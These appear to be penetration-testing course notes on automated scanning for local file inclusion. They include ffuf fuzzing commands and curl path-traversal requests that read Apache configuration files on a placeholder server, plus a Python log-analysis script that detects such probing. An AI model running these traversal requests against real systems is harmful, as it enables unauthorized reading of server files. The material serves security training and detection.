8. Automated scanning

Key Takeaways:

  • Importance of Manual Testing:

    • Emphasizes that automated scanning is not a replacement for manual testing.

    • Custom payloads and techniques are often required for complex vulnerabilities.

    • Bypassing WAFs and firewalls requires in-depth understanding.

  • Fuzzing Parameters:

    • Using ffuf to discover hidden GET/POST parameters.

    • Highlighting that hidden parameters may be less secure.

    • Providing a link to common LFI parameters.

  • LFI Wordlists:

    • Using wordlists like LFI-Jhaddix.txt to automate LFI payload testing.

    • Demonstrating how to use ffuf with LFI wordlists.

    • Good explanation of how to verify the wordlist results.

  • Fuzzing Server Files:

    • Fuzzing for server webroot paths, configuration files, and log files.

    • Providing links to Linux and Windows webroot wordlists.

    • Demonstrating how to find server configurations and log paths.

    • Good explanation of how to follow file paths and find the needed information.

  • LFI Tools:

    • Mentioning popular LFI tools like LFISuite, LFiFreak, and liffy.

    • Acknowledging that many tools are outdated and rely on Python 2.

    • Good advice to test the tools to check their accuracy.

Additional Considerations:

  • Tool Limitations:

    • Automated tools may miss complex vulnerabilities or bypasses.

    • False positives and false negatives are common.

    • Tools need to be updated to be effective.

  • Wordlist Selection:

    • Choosing appropriate wordlists is crucial for effective scanning.

    • Custom wordlists may be needed for specific applications.

  • WAF Evasion:

    • Automated tools may not be effective against advanced WAFs.

    • Manual testing and payload crafting are often required.

  • Ethical Considerations:

    • Automated scanning should only be performed on systems with explicit permission.

    • Avoid causing denial-of-service (DoS) attacks.

  • Scripting:

    • Writing custom scripts can be a very effective way to automate the scanning process.

    • Python is a very useful language for this task.

  • Regular Expressions:

    • When dealing with large amounts of data from log files or configuration files, regular expressions are very useful.

# Discovering hidden parameters
ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

# Finding LFI vulnerabilities using wordlists
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

# Searching for default web root directories on Linux
ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

# Using a custom LFI wordlist
ffuf -w ./LFI-WordList-Linux:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
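As a defender-side counterpart to the ffuf runs above and to the scripting and regular-expression notes earlier, here is an added Python example (not part of the original notes) that scans Apache access-log lines for the two traces such wordlist fuzzing leaves behind: parameter values that decode to a path traversal, and one client cycling through many distinct values of a single parameter. The log lines, IP addresses and the threshold of 3 are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log sample (no real hosts). The 10.0.0.9 lines mimic
# a wordlist fuzz of the "language" parameter like the ffuf runs above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 2287
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 1833
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fapache2%2fapache2.conf HTTP/1.1" 200 7100
10.0.0.9 - - [10/May/2024:12:00:03 +0000] "GET /index.php?language=../../../../var/www/html/index.php HTTP/1.1" 200 2287
10.0.0.9 - - [10/May/2024:12:00:03 +0000] "GET /index.php?language=fr HTTP/1.1" 200 2287
10.0.0.5 - - [10/May/2024:12:00:04 +0000] "GET /index.php?language=de HTTP/1.1" 200 2287
"""

# Common/combined log format: client, ident, user, [timestamp], "METHOD target proto", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
# Traversal sequences or absolute system paths that a language/page parameter should never carry
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|(^|/)(etc|proc|var/log)/)')

def normalize(value, rounds=3):
    """URL-decode repeatedly (bounded) so single- and double-encoded values look alike."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyze(log_text, fuzz_threshold=3):
    """Return (traversal_hits, fuzz_sources).
    traversal_hits: list of (ip, param, decoded_value) whose value looks like path traversal.
    fuzz_sources:   {(ip, param): distinct_value_count} for clients that sent at least
                    fuzz_threshold distinct values for one parameter (wordlist behaviour)."""
    traversal_hits = []
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash on malformed input
        query = urlsplit(m.group("target")).query
        for param, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
            value = normalize(raw)                                   # catch deeper encodings
            seen[(m.group("ip"), param)].add(value)
            if TRAVERSAL_RE.search(value):
                traversal_hits.append((m.group("ip"), param, value))
    fuzz_sources = {k: len(v) for k, v in seen.items() if len(v) >= fuzz_threshold}
    return traversal_hits, fuzz_sources
```

On the sample, only 10.0.0.9 is reported on both counts: three traversal values and four distinct values for `language`, while 10.0.0.5's two ordinary values stay below the threshold.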

curl (HTTP Request Tool)

A command-line tool for transferring data with URLs, commonly used for making HTTP requests.

Examples:

# Accessing a sensitive configuration file (URL quoted so the shell does not treat < > and ? specially)
curl 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf'

# Extracting environment variables from the server
curl 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars'

Key Points:

  • The primary tools used are ffuf for fuzzing and curl for making HTTP requests.

  • This guide focuses on Linux-based web servers and file inclusion vulnerabilities.
